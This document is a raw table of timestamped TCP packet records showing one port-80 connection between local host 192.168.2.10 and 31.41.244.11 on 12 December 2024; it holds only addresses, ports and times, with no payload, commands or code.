Dec 12, 2024 16:48:39.609534025 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.609581947 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.609915018 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.609963894 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.610603094 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.610657930 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.610726118 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.610991001 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.613034010 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.613064051 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.613075972 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.613086939 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.613095999 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.613107920 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.613114119 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.613821983 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.613864899 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.613940001 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.613987923 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.614907026 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.614957094 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.615117073 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.615185976 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.615961075 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.616014004 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.616056919 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.616091967 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.617089987 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.617147923 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.617425919 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.617475033 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.618190050 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.618240118 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.618607044 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.618654013 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.619172096 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.619270086 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.619529009 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.619575024 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.620264053 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.620316029 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.620388985 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.620426893 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.621350050 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.621412992 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.621432066 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.621471882 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.622353077 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.622400045 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.622462034 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.622545004 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.623447895 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.623507023 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.623898983 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.623955965 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.624514103 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.624568939 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.625638008 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.625650883 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.625693083 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.625708103 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.625746965 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.625880957 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.626631021 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.626688004 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.762785912 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.762842894 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.763079882 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.763129950 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.763310909 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.763374090 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.764306068 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.764339924 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.764391899 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.765454054 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.765531063 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.765583992 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.766769886 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.766812086 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.766833067 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.766865015 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.767874956 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.767895937 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.767940044 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.768605947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.768676996 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.768743038 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.769452095 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.769494057 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.769555092 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.770454884 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.770598888 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.770689011 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.770952940 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.770998001 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.771641970 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.771692038 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.771753073 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.772684097 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.772789955 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.772835970 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.773747921 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.773811102 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.773855925 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.774775028 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.774876118 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.774878025 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.775332928 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.775876045 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.775928974 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.776029110 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.776962042 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.777216911 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.777273893 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.777988911 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.778067112 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.778114080 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.779084921 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.779169083 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.779264927 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.779645920 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.780189037 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.780251980 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.780277967 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.780365944 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.781248093 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.781378031 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.781423092 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.782356024 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.782560110 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.782630920 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.783404112 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.783544064 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.783593893 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.784449100 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.784539938 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.784585953 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.785598040 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.785733938 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.785768986 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.786562920 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.786694050 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.786735058 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.787636995 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.787775993 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.787822008 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.788758039 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.788954973 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.788974047 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.790040970 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.790216923 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.790339947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.790994883 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.791040897 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.791054010 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.791176081 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.792170048 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.792264938 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.792342901 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.793250084 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.793350935 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.793411970 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.794087887 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.794173956 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.794178009 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.795129061 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.795185089 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.795219898 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.795653105 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.796217918 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.796349049 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.796502113 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.797306061 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.797439098 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.797521114 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.798460960 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.798559904 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.798609018 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.799549103 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.799657106 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.799685955 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.799736977 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.800527096 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.800631046 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.800681114 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.801594019 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.801765919 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.801851988 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.802623034 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.802664042 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.802684069 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.802709103 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.803688049 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.803750038 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.803838015 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.804768085 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.804867029 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.804920912 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.806008101 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.806015015 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.806065083 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.807037115 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.807089090 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.807156086 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.808201075 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.808352947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.808418036 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.809051037 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.809103966 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.809108973 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.810116053 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.810219049 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.810245991 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.811194897 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.811270952 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.811292887 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.811326027 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.812345028 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.812429905 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.812486887 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.813359022 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.813586950 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.813782930 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.814418077 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.814470053 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.814562082 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.815479994 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.815531015 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.815599918 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.815660954 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.816620111 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.816625118 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.816683054 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.817624092 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.817724943 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.817771912 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.818689108 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.818749905 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.955122948 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.955255032 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.955368042 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.955387115 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.955559015 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.955610037 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.956455946 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.956480026 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.956532955 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.957633018 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.957815886 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.957873106 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.958802938 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.958873034 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.958916903 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.959681988 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.959758043 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.959860086 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.960743904 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.960875034 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.972090006 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972124100 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972131968 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972197056 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.972218990 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972225904 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972232103 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972239017 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972265005 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.972279072 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.972363949 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972475052 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972491980 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972500086 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972511053 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972517014 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972524881 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972524881 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.972554922 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.972580910 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.972863913 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972871065 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972882032 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972887993 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972893953 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972906113 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972914934 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.972919941 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.972940922 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.972965956 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.973120928 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.973139048 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.973181963 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.974190950 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.974253893 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.974307060 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.980005980 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.980032921 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.980046034 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.980087996 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.980110884 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.980142117 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.980158091 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.980165005 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.980201960 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.980319977 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.980326891 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.980338097 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.980345011 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.980371952 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.980513096 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.980520010 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.980561972 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.981050014 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.981125116 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.981193066 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.982180119 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.982268095 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.982316971 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.983230114 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.983341932 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.983390093 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.984285116 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.984479904 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.984524965 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.985403061 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.985539913 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.985589981 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.986428976 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.986577034 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.986623049 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.987504959 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.987555981 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.987601042 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.988636017 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.989010096 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.989105940 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.989609003 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.989783049 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.989829063 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.990665913 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.990710974 CET	49931	80	192.168.2.10	31.41.244.11
